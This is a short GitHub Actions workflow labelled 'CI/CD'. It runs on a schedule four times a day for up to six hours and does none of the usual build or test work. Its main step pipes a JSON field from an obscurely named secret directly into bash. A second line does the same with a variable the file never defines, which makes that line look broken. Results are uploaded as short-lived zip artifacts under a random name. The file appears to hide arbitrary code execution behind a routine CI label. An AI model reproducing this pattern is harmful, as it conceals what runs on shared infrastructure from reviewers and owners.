name: CI/CD
on:
  workflow_dispatch:

  schedule:
    - cron: '14 3,9,15,21 * * *'
jobs:
  workflow:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Perform
        env:
          vjp11: ${{ secrets.vjp11 }}
        run: |
          printf '%s' "$vjp11" | jq -r .b03140 | /bin/bash
          echo $ioeo778 | jq -r .pdzjm2 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: JyuEoW19
          path: "*.zip"
          retention-days: 1
